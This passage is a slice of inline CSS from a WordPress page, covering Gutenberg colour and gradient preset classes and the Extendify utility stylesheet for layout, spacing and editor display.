var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <style id='extendify-gutenberg-patterns-and-templates-utilities-inline-css' type='text/css'> .ext-absolute { position: absolute !important; } .ext-relative { position: relative !important; } .ext-top-base { top: var(--wp--style--block-gap, 1.75rem) !important; } .ext-top-lg { top: var(--extendify--spacing--large, 3rem) !important; } .ext--top-base { top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--top-lg { top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-right-base { right: var(--wp--style--block-gap, 1.75rem) !important; } .ext-right-lg { right: var(--extendify--spacing--large, 3rem) !important; } .ext--right-base { right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--right-lg { right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-bottom-base { bottom: var(--wp--style--block-gap, 1.75rem) !important; } .ext-bottom-lg { bottom: var(--extendify--spacing--large, 3rem) !important; } .ext--bottom-base { bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--bottom-lg { bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-left-base { left: var(--wp--style--block-gap, 1.75rem) !important; } .ext-left-lg { left: var(--extendify--spacing--large, 3rem) !important; } .ext--left-base { left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--left-lg { left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-order-1 { order: 1 !important; } .ext-order-2 { order: 2 !important; } .ext-col-auto { grid-column: auto !important; } .ext-col-span-1 { grid-column: span 1 / span 1 !important; } .ext-col-span-2 { grid-column: span 2 / span 2 !important; } .ext-col-span-3 { grid-column: span 3 / span 3 !important; } .ext-col-span-4 { grid-column: span 4 / span 4 !important; } .ext-col-span-5 { grid-column: span 5 / span 5 !important; } .ext-col-span-6 { grid-column: span 6 / span 6 !important; } .ext-col-span-7 { grid-column: span 7 / span 7 !important; } .ext-col-span-8 { grid-column: span 8 / span 8 !important; } .ext-col-span-9 { grid-column: span 9 / span 9 !important; } .ext-col-span-10 { grid-column: span 10 / span 10 !important; } .ext-col-span-11 { grid-column: span 11 / span 11 !important; } .ext-col-span-12 { grid-column: span 12 / span 12 !important; } .ext-col-span-full { grid-column: 1 / -1 !important; } .ext-col-start-1 { grid-column-start: 1 !important; } .ext-col-start-2 { grid-column-start: 2 !important; } .ext-col-start-3 { grid-column-start: 3 !important; } .ext-col-start-4 { grid-column-start: 4 !important; } .ext-col-start-5 { grid-column-start: 5 !important; } .ext-col-start-6 { grid-column-start: 6 !important; } .ext-col-start-7 { grid-column-start: 7 !important; } .ext-col-start-8 { grid-column-start: 8 !important; } .ext-col-start-9 { grid-column-start: 9 !important; } .ext-col-start-10 { grid-column-start: 10 !important; } .ext-col-start-11 { grid-column-start: 11 !important; } .ext-col-start-12 { grid-column-start: 12 !important; } .ext-col-start-13 { grid-column-start: 13 !important; } .ext-col-start-auto { grid-column-start: auto !important; } .ext-col-end-1 { grid-column-end: 1 !important; } .ext-col-end-2 { grid-column-end: 2 !important; } .ext-col-end-3 { grid-column-end: 3 !important; } .ext-col-end-4 { grid-column-end: 4 !important; } .ext-col-end-5 { grid-column-end: 5 !important; } .ext-col-end-6 { grid-column-end: 6 !important; } .ext-col-end-7 { grid-column-end: 7 !important; } .ext-col-end-8 { grid-column-end: 8 !important; } .ext-col-end-9 { grid-column-end: 9 !important; } .ext-col-end-10 { grid-column-end: 10 !important; } .ext-col-end-11 { grid-column-end: 11 !important; } .ext-col-end-12 { grid-column-end: 12 !important; } .ext-col-end-13 { grid-column-end: 13 !important; } .ext-col-end-auto { grid-column-end: auto !important; } .ext-row-auto { grid-row: auto !important; } .ext-row-span-1 { grid-row: span 1 / span 1 !important; } .ext-row-span-2 { grid-row: span 2 / span 2 !important; } .ext-row-span-3 { grid-row: span 3 / span 3 !important; } .ext-row-span-4 { grid-row: span 4 / span 4 !important; } .ext-row-span-5 { grid-row: span 5 / span 5 !important; } .ext-row-span-6 { grid-row: span 6 / span 6 !important; } .ext-row-span-full { grid-row: 1 / -1 !important; } .ext-row-start-1 { grid-row-start: 1 !important; } .ext-row-start-2 { grid-row-start: 2 !important; } .ext-row-start-3 { grid-row-start: 3 !important; } .ext-row-start-4 { grid-row-start: 4 !important; } .ext-row-start-5 { grid-row-start: 5 !important; } .ext-row-start-6 { grid-row-start: 6 !important; } .ext-row-start-7 { grid-row-start: 7 !important; } .ext-row-start-auto { grid-row-start: auto !important; } .ext-row-end-1 { grid-row-end: 1 !important; } .ext-row-end-2 { grid-row-end: 2 !important; } .ext-row-end-3 { grid-row-end: 3 !important; } .ext-row-end-4 { grid-row-end: 4 !important; } .ext-row-end-5 { grid-row-end: 5 !important; } .ext-row-end-6 { grid-row-end: 6 !important; } .ext-row-end-7 { grid-row-end: 7 !important; } .ext-row-end-auto { grid-row-end: auto !important; } .ext-m-0:not([style*="margin"]) { margin: 0 !important; } .ext-m-auto:not([style*="margin"]) { margin: auto !important; } .ext-m-base:not([style*="margin"]) { margin: var(--wp--style--block-gap, 1.75rem) !important; } .ext-m-lg:not([style*="margin"]) { margin: var(--extendify--spacing--large, 3rem) !important; } .ext--m-base:not([style*="margin"]) { margin: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--m-lg:not([style*="margin"]) { margin: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-mx-0:not([style*="margin"]) { margin-left: 0 !important; margin-right: 0 !important; } .ext-mx-auto:not([style*="margin"]) { margin-left: auto !important; margin-right: auto !important; } .ext-mx-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .ext-mx-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; margin-right: var(--extendify--spacing--large, 3rem) !important; } .ext--mx-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--mx-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-my-0:not([style*="margin"]) { margin-top: 0 !important; margin-bottom: 0 !important; } .ext-my-auto:not([style*="margin"]) { margin-top: auto !important; margin-bottom: auto !important; } .ext-my-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .ext-my-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .ext--my-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--my-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-mt-0:not([style*="margin"]) { margin-top: 0 !important; } .ext-mt-auto:not([style*="margin"]) { margin-top: auto !important; } .ext-mt-base:not([style*="margin"]) { margin-top: var(--wp--style--block-gap, 1.75rem) !important; } .ext-mt-lg:not([style*="margin"]) { margin-top: var(--extendify--spacing--large, 3rem) !important; } .ext--mt-base:not([style*="margin"]) { margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--mt-lg:not([style*="margin"]) { margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-mr-0:not([style*="margin"]) { margin-right: 0 !important; } .ext-mr-auto:not([style*="margin"]) { margin-right: auto !important; } .ext-mr-base:not([style*="margin"]) { margin-right: var(--wp--style--block-gap, 1.75rem) !important; } .ext-mr-lg:not([style*="margin"]) { margin-right: var(--extendify--spacing--large, 3rem) !important; } .ext--mr-base:not([style*="margin"]) { margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--mr-lg:not([style*="margin"]) { margin-right: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-mb-0:not([style*="margin"]) { margin-bottom: 0 !important; } .ext-mb-auto:not([style*="margin"]) { margin-bottom: auto !important; } .ext-mb-base:not([style*="margin"]) { margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .ext-mb-lg:not([style*="margin"]) { margin-bottom: var(--extendify--spacing--large, 3rem) !important; } .ext--mb-base:not([style*="margin"]) { margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--mb-lg:not([style*="margin"]) { margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-ml-0:not([style*="margin"]) { margin-left: 0 !important; } .ext-ml-auto:not([style*="margin"]) { margin-left: auto !important; } .ext-ml-base:not([style*="margin"]) { margin-left: var(--wp--style--block-gap, 1.75rem) !important; } .ext-ml-lg:not([style*="margin"]) { margin-left: var(--extendify--spacing--large, 3rem) !important; } .ext--ml-base:not([style*="margin"]) { margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) !important; } .ext--ml-lg:not([style*="margin"]) { margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !important; } .ext-block { display: block !important; } .ext-inline-block { display: inline-block !important; } .ext-inline { display: inline !important; } .ext-flex { display: flex !important; } .ext-inline-flex { display: inline-flex !important; } .ext-grid { display: grid !important; } .ext-inline-grid { display: inline-grid !important; } .ext-hidden { display: none !important; } .ext-w-auto { width: auto !important; } .ext-w-full { width: 100% !important; } .ext-max-w-full { max-width: 100% !important; } .ext-flex-1 { flex: 1 1 0% !important; } .ext-flex-auto { flex: 1 1 auto !important; } .ext-flex-initial { flex: 0 1 auto !important; } .ext-flex-none { flex: none !important; } .ext-flex-shrink-0 { flex-shrink: 0 !important; } .ext-flex-shrink { flex-shrink: 1 !important; } .ext-flex-grow-0 { flex-grow: 0 !important; } .ext-flex-grow { flex-grow: 1 !important; } .ext-list-none { list-style-type: none !important; } .ext-grid-cols-1 { grid-template-columns: repeat(1, minmax(0, 1fr)) !important; } .ext-grid-cols-2 { grid-template-columns: repeat(2, minmax(0, 1fr)) !important; } .ext-grid-cols-3 { grid-template-columns: repeat(3, minmax(0, 1fr)) !important; } .ext-grid-cols-4 { grid-template-columns: repeat(4, minmax(0, 1fr)) !important; } .ext-grid-cols-5 { grid-template-columns: repeat(5, minmax(0, 1fr)) !important; } .ext-grid-cols-6 { grid-template-columns: repeat(6, minmax(0, 1fr)) !important; } .ext-grid-cols-7 { grid-template-columns: repeat(7, minmax(0, 1fr)) !important; } .ext-grid-cols-8 { grid-template-columns: repeat(8, minmax(0, 1fr)) !important; } .ext-grid-cols-9 { grid-template-columns: repeat(9, minmax(0, 1fr)) !important; } .ext-grid-cols-10 { grid-template-columns: repeat(10, minmax(0, 1fr)) !important; } .ext-grid-cols-11 { grid-template-columns: repeat(11, minmax(0, 1fr)) !important; } .ext-grid-cols-12 { grid-template-columns: repeat(12, minmax(0, 1fr)) !important; } .ext-grid-cols-none { grid-template-columns: none !important; } .ext-grid-rows-1 { grid-template-rows: repeat(1, minmax(0, 1fr)) !important; } .ext-grid-rows-2 { grid-template-rows: repeat(2, minmax(0, 1fr)) !important; } .ext-grid-rows-3 { grid-template-rows: repeat(3, minmax(0, 1fr)) !important; } .ext-grid-rows-4 { grid-template-rows: repeat(4, minmax(0, 1fr)) !important; } .ext-grid-rows-5 { grid-template-rows: repeat(5, minmax(0, 1fr)) !important; } .ext-grid-rows-6 { grid-template-rows: repeat(6, minmax(0, 1fr)) !important; } .ext-grid-rows-none { grid-template-rows: none !important; } .ext-flex-row { flex-direction: row !important; } .ext-flex-row-reverse { flex-direction: row-reverse !important; } .ext-flex-col { flex-direction: column !important; } .ext-flex-col-reverse { flex-direction: column-reverse !important; } .ext-flex-wrap { flex-wrap: wrap !important; } .ext-flex-wrap-reverse { flex-wrap: wrap-reverse !important; } .ext-flex-nowrap { flex-wrap: nowrap !important; } .ext-items-start { align-items: flex-start !important; } .ext-items-end { align-items: flex-end !important; } .ext-items-center { align-items: center !important; } .ext-items-baseline { align-items: baseline !important; } .ext-items-stretch { align-items: stretch !important; } .ext-justify-start { justify-content: flex-start !important; } .ext-justify-end { justify-content: flex-end !important; } .ext-justify-center { justify-content: center !important; } .ext-justify-between { justify-content: space-between !important; } .ext-justify-around { justify-content: space-around !important; } .ext-justify-evenly { justify-content: space-evenly !important; } .ext-justify-items-start { justify-items: start !important; } .ext-justify-items-end { justify-items: end !important; } .ext-justify-items-center { justify-items: center !important; } .ext-justify-items-stretch { justify-items: stretch !important; } .ext-gap-0 { gap: 0 !important; } .ext-gap-base { gap: var(--wp--style--block-gap, 1.75rem) !important; } .ext-gap-lg { gap: var(--extendify--spacing--large, 3rem) !important; } .ext-gap-x-0 { -moz-column-gap: 0 !important; column-gap: 0 !important; } .ext-gap-x-base { -moz-column-gap: var(--wp--style--block-gap, 1.75rem) !important; column-gap: var(--wp--style--block-gap, 1.75rem) !important; } .ext-gap-x-lg { -moz-column-gap: var(--extendify--spacing--large, 3rem) !important; column-gap: var(--extendify--spacing--large, 3rem) !important; } .ext-gap-y-0 { row-gap: 0 !important; } .ext-gap-y-base { row-gap: var(--wp--style--block-gap, 1.75rem) !important; } .ext-gap-y-lg { row-gap: var(--extendify--spacing--large, 3rem) !important; } .ext-justify-self-auto { justify-self: auto !important; } .ext-justify-self-start { justify-self: start !important; } .ext-justify-self-end { justify-self: end !important; } .ext-justify-self-center { justify-self: center !important; } .ext-justify-self-stretch { justify-self: stretch !important; } .ext-rounded-none { border-radius: 0px !important; } .ext-rounded-full { border-radius: 9999px !important; } .ext-rounded-t-none { border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; } .ext-rounded-t-full { border-top-left-radius: 9999px !important; border-top-right-radius: 9999px !important; } .ext-rounded-r-none { border-top-right-radius: 0px !important; border-bottom-right-radius: 0px !important; } .ext-rounded-r-full { border-top-right-radius: 9999px !important; border-bottom-right-radius: 9999px !important; } .ext-rounded-b-none { border-bottom-right-radius: 0px !important; border-bottom-left-radius: 0px !important; } .ext-rounded-b-full { border-bottom-right-radius: 9999px !important; border-bottom-left-radius: 9999px !important; } .ext-rounded-l-none { border-top-left-radius: 0px !important; border-bottom-left-radius: 0px !important; } .ext-rounded-l-full { border-top-left-radius: 9999px !important; border-bottom-left-radius: 9999px !important; } .ext-rounded-tl-none { border-top-left-radius: 0px !important; } .ext-rounded-tl-full { border-top-left-radius: 9999px !important; } .ext-rounded-tr-none { border-top-right-radius: 0px !important; } .ext-rounded-tr-full { border-top-right-radius: 9999px !important; } .ext-rounded-br-none { border-bottom-right-radius: 0px !important; } .ext-rounded-br-full { border-bottom-right-radius: 9999px !important; } .ext-rounded-bl-none { border-bottom-left-radius: 0px !important; } .ext-rounded-bl-full { border-bottom-left-radius: 9999px !important; } .ext-border-0 { border-width: 0px !important; } .ext-border-t-0 { border-top-width: 0px !important; } .ext-border-r-0 { border-right-width: 0px !important; } .ext-border-b-0 { border-bottom-width: 0px !important; } .ext-border-l-0 { border-left-width: 0px !important; } .ext-p-0:not([style*="padding"]) { padding: 0 !important; } .ext-p-base:not([style*="padding"]) { padding: var(--wp--style--block-gap, 1.75rem) !important; } .ext-p-lg:not([style*="padding"]) { padding: var(--extendify--spacing--large, 3rem) !important; } .ext-px-0:not([style*="padding"]) { padding-left: 0 !important; padding-right: 0 !important; } .ext-px-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .ext-px-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; padding-right: var(--extendify--spacing--large, 3rem) !important; } .ext-py-0:not([style*="padding"]) { padding-top: 0 !important; padding-bottom: 0 !important; } .ext-py-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .ext-py-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .ext-pt-0:not([style*="padding"]) { padding-top: 0 !important; } .ext-pt-base:not([style*="padding"]) { padding-top: var(--wp--style--block-gap, 1.75rem) !important; } .ext-pt-lg:not([style*="padding"]) { padding-top: var(--extendify--spacing--large, 3rem) !important; } .ext-pr-0:not([style*="padding"]) { padding-right: 0 !important; } .ext-pr-base:not([style*="padding"]) { padding-right: var(--wp--style--block-gap, 1.75rem) !important; } .ext-pr-lg:not([style*="padding"]) { padding-right: var(--extendify--spacing--large, 3rem) !important; } .ext-pb-0:not([style*="padding"]) { padding-bottom: 0 !important; } .ext-pb-base:not([style*="padding"]) { padding-bottom: var(--wp--style--block-gap, 1.75rem) !important; } .ext-pb-lg:not([style*="padding"]) { padding-bottom: var(--extendify--spacing--large, 3rem) !important; } .ext-pl-0:not([style*="padding"]) { padding-left: 0 !important; } .ext-pl-base:not([style*="padding"]) { padding-left: var(--wp--style--block-gap, 1.75rem) !important; } .ext-pl-lg:not([style*="padding"]) { padding-left: var(--extendify--spacing--large, 3rem) !important; } .ext-text-left { text-align: left !important; } .ext-text-center { text-align: center !important; } .ext-text-right { text-align: right !important; } .ext-leading-none { line-height: 1 !important; } .ext-leading-tight { line-height: 1.25 !important; } .ext-leading-snug { line-height: 1.375 !important; } .ext-leading-normal { line-height: 1.5 !important; } .ext-leading-relaxed { line-height: 1.625 !important; } .ext-leading-loose { line-height: 2 !important; } .ext-aspect-square img { aspect-ratio: 1 / 1 !important; -o-object-fit: cover !important; object-fit: cover !important; } .ext-aspect-landscape img { aspect-ratio: 4 / 3 !important; -o-object-fit: cover !important; object-fit: cover !important; } .ext-aspect-landscape-wide img { aspect-ratio: 16 / 9 !important; -o-object-fit: cover !important; object-fit: cover !important; } .ext-aspect-portrait img { aspect-ratio: 3 / 4 !important; -o-object-fit: cover !important; object-fit: cover !important; } .ext-aspect-square .components-resizable-box__container, .ext-aspect-landscape .components-resizable-box__container, .ext-aspect-landscape-wide .components-resizable-box__container, .ext-aspect-portrait .components-resizable-box__container { height: auto !important; } .clip-path--rhombus img { -webkit-clip-path: polygon(15% 6%, 80% 29%, 84% 93%, 23% 69%) !important; clip-path: polygon(15% 6%, 80% 29%, 84% 93%, 23% 69%) !important; } .clip-path--diamond img { -webkit-clip-path: polygon(5% 29%, 60% 2%, 91% 64%, 36% 89%) !important; clip-path: polygon(5% 29%, 60% 2%, 91% 64%, 36% 89%) !important; } .clip-path--rhombus-alt img { -webkit-clip-path: polygon(14% 9%, 85% 24%, 91% 89%, 19% 76%) !important; clip-path: polygon(14% 9%, 85% 24%, 91% 89%, 19% 76%) !important; } /* The .ext utility is a top-level class that we use to target contents within our patterns. We use it here to ensure columns blocks display well across themes. */ .wp-block-columns[class*="fullwidth-cols"] { /* no suggestion */ margin-bottom: unset !important; } .wp-block-column.editor\:pointer-events-none { /* no suggestion */ margin-top: 0 !important; margin-bottom: 0 !important; } .is-root-container.block-editor-block-list__layout > [data-align="full"]:not(:first-of-type) > .wp-block-column.editor\:pointer-events-none, .is-root-container.block-editor-block-list__layout > [data-align="wide"] > .wp-block-column.editor\:pointer-events-none { /* no suggestion */ margin-top: calc(-1 * var(--wp--style--block-gap, 28px)) !important; } .is-root-container.block-editor-block-list__layout > [data-align="full"]:not(:first-of-type) > .ext-my-0, .is-root-container.block-editor-block-list__layout > [data-align="wide"] > .ext-my-0:not([style*="margin"]) { /* no suggestion */ margin-top: calc(-1 * var(--wp--style--block-gap, 28px)) !important; } /* Some popular themes use padding instead of core margin for columns; remove it */ .ext .wp-block-columns .wp-block-column[style*="padding"] { /* no suggestion */ padding-left: 0 !important; padding-right: 0 !important; } /* Some popular themes add double spacing between columns; remove it */ .ext .wp-block-columns + .wp-block-columns:not([class*="mt-"]):not([class*="my-"]):not([style*="margin"]) { /* no suggestion */ margin-top: 0 !important; } [class*="fullwidth-cols"] .wp-block-column:first-child, [class*="fullwidth-cols"] .wp-block-group:first-child { /* no suggestion */ } [class*="fullwidth-cols"] .wp-block-column:first-child, [class*="fullwidth-cols"] .wp-block-group:first-child { margin-top: 0 !important; } [class*="fullwidth-cols"] .wp-block-column:last-child, [class*="fullwidth-cols"] .wp-block-group:last-child { /* no suggestion */ } [class*="fullwidth-cols"] .wp-block-column:last-child, [class*="fullwidth-cols"] .wp-block-group:last-child { margin-bottom: 0 !important; } [class*="fullwidth-cols"] .wp-block-column:first-child > * { /* no suggestion */ margin-top: 0 !important; } [class*="fullwidth-cols"] .wp-block-column > *:first-child { /* no suggestion */ margin-top: 0 !important; } [class*="fullwidth-cols"] .wp-block-column > *:last-child { /* no suggestion */ margin-bottom: 0 !important; } .ext .is-not-stacked-on-mobile .wp-block-column { /* no suggestion */ margin-bottom: 0 !important; } /* Add base margin bottom to all columns */ .wp-block-columns[class*="fullwidth-cols"]:not(.is-not-stacked-on-mobile) > .wp-block-column:not(:last-child) { /* no suggestion */ margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } @media (min-width: 782px) { .wp-block-columns[class*="fullwidth-cols"]:not(.is-not-stacked-on-mobile) > .wp-block-column:not(:last-child) { /* no suggestion */ margin-bottom: 0 !important; } } /* Remove margin bottom from "not-stacked" columns */ .wp-block-columns[class*="fullwidth-cols"].is-not-stacked-on-mobile > .wp-block-column { /* no suggestion */ margin-bottom: 0 !important; } @media (min-width: 600px) and (max-width: 781px) { .wp-block-columns[class*="fullwidth-cols"]:not(.is-not-stacked-on-mobile) > .wp-block-column:nth-child(even) { /* no suggestion */ margin-left: var(--wp--style--block-gap, 2em) !important; } } /* The `tablet:fullwidth-cols` and `desktop:fullwidth-cols` utilities are used to counter the core/columns responsive for at our breakpoints. */ @media (max-width: 781px) { .tablet\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) { flex-wrap: wrap !important; } .tablet\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column { margin-left: 0 !important; } .tablet\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column:not([style*="margin"]) { /* no suggestion */ margin-left: 0 !important; } .tablet\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column { flex-basis: 100% !important; /* Required to negate core/columns flex-basis */ } } @media (max-width: 1079px) { .desktop\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) { flex-wrap: wrap !important; } .desktop\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column { margin-left: 0 !important; } .desktop\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column:not([style*="margin"]) { /* no suggestion */ margin-left: 0 !important; } .desktop\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column { flex-basis: 100% !important; /* Required to negate core/columns flex-basis */ } .desktop\:fullwidth-cols.wp-block-columns:not(.is-not-stacked-on-mobile) > .wp-block-column:not(:last-child) { margin-bottom: var(--wp--style--block-gap, 1.75rem) !important; } } .direction-rtl { direction: rtl !important; } .direction-ltr { direction: ltr !important; } /* Use "is-style-" prefix to support adding this style to the core/list block */ .is-style-inline-list { padding-left: 0 !important; } .is-style-inline-list li { /* no suggestion */ list-style-type: none !important; } @media (min-width: 782px) { .is-style-inline-list li { margin-right: var(--wp--style--block-gap, 1.75rem) !important; display: inline !important; } } .is-style-inline-list li:first-child { /* no suggestion */ } @media (min-width: 782px) { .is-style-inline-list li:first-child { margin-left: 0 !important; } } .is-style-inline-list li:last-child { /* no suggestion */ } @media (min-width: 782px) { .is-style-inline-list li:last-child { margin-right: 0 !important; } } .bring-to-front { position: relative !important; z-index: 10 !important; } .text-stroke { -webkit-text-stroke-width: var( --wp--custom--typography--text-stroke-width, 2px ) !important; -webkit-text-stroke-color: var(--wp--preset--color--background) !important; } .text-stroke--primary { -webkit-text-stroke-width: var( --wp--custom--typography--text-stroke-width, 2px ) !important; -webkit-text-stroke-color: var(--wp--preset--color--primary) !important; } .text-stroke--secondary { -webkit-text-stroke-width: var( --wp--custom--typography--text-stroke-width, 2px ) !important; -webkit-text-stroke-color: var(--wp--preset--color--secondary) !important; } .editor\:no-caption .block-editor-rich-text__editable { display: none !important; } .editor\:no-inserter > .block-list-appender, .editor\:no-inserter .wp-block-group__inner-container > .block-list-appender { display: none !important; } .editor\:no-inserter .wp-block-cover__inner-container > .block-list-appender { display: none !important; } .editor\:no-inserter .wp-block-column:not(.is-selected) > .block-list-appender { display: none !important; } .editor\:no-resize .components-resizable-box__handle::after, .editor\:no-resize .components-resizable-box__side-handle::before, .editor\:no-resize .components-resizable-box__handle { display: none !important; pointer-events: none !important; } .editor\:no-resize .components-resizable-box__container { display: block !important; } .editor\:pointer-events-none { pointer-events: none !important; } .is-style-angled { /* no suggestion */ align-items: center !important; justify-content: flex-end !important; } .ext .is-style-angled > [class*="_inner-container"] { align-items: center !important; } .is-style-angled .wp-block-cover__image-background, .is-style-angled .wp-block-cover__video-background { /* no suggestion */ -webkit-clip-path: polygon(0 0, 30% 0%, 50% 100%, 0% 100%) !important; clip-path: polygon(0 0, 30% 0%, 50% 100%, 0% 100%) !important; z-index: 1 !important; } @media (min-width: 782px) { .is-style-angled .wp-block-cover__image-background, .is-style-angled .wp-block-cover__video-background { /* no suggestion */ -webkit-clip-path: polygon(0 0, 55% 0%, 65% 100%, 0% 100%) !important; clip-path: polygon(0 0, 55% 0%, 65% 100%, 0% 100%) !important; } } .has-foreground-color { /* no suggestion */ color: var(--wp--preset--color--foreground, #000) !important; } .has-foreground-background-color { /* no suggestion */ background-color: var(--wp--preset--color--foreground, #000) !important; } .has-background-color { /* no suggestion */ color: var(--wp--preset--color--background, #fff) !important; } .has-background-background-color { 